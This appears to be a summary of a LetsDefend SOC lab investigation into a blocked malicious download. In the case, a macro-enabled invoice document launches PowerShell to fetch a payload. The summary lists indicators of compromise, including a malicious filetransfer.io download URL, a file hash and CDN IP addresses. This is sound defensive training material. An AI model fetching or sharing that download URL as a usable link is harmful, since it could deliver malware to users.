In this article, we explore the investigation of Event ID 76: Malicious File/Script Download Attempt on the LetsDefend platform, focusing on the analysis of a potential malicious actor and the behaviors of the PowerShell script used for the attack. The investigation reveals how sourced documents can initiate harmful activities and emphasizes the importance of thorough log examination and threat assessment. Affected: LetsDefend platform, SOC operations, network security
Keypoints :
- Event ID 76 indicates a malicious file/script download attempt.
- The attack was logged on March 14, 2021, at 19:15 with a blocked action due to malicious activity.
- A malicious document (INVOICE PACKAGE LINK TO DOWNLOAD.docm) triggered the threat.
- The file hash (MD5: f2d0c66b801244c059f636d08a474079) was checked using VirusTotal, revealing it flagged as malicious by 30 out of 65 vendors.
- Dynamic analysis using AnyRun indicated that PowerShell is utilized to execute remote commands.
- The PowerShell command downloads a file from a potentially harmful domain (filetransfer.io).
- Active connection attempts were made to IP addresses associated with CDN services (Cloudflare and Fastly).
- No significant logs were found for the analyzed endpoint, NicolasPRD, indicating possible evasion of detection.
- The investigation concluded that the payload was blocked; however, further malicious activities were suspected.
- In the closing report, the team affirmed that malware was likely quarantined.
MITRE Techniques :
- T1071 — Application Layer Protocol: Utilization of HTTP/HTTPS protocols for communication with command and control servers.
Indicator of Compromise :
- URL filetransfer.io/data-package/UR2whub8V/download (malicious download source)
- IP Address 188.114.96.3 (Cloudflare)
- IP Address 199.232.210.172 (Fastly CDN)
- MD5: f2d0c66b801244c059f636d08a474079 (hash of the suspicious file)
- URL for PowerShell Download Cradle: https://filetransfer.io/data-package/XXXXXX/download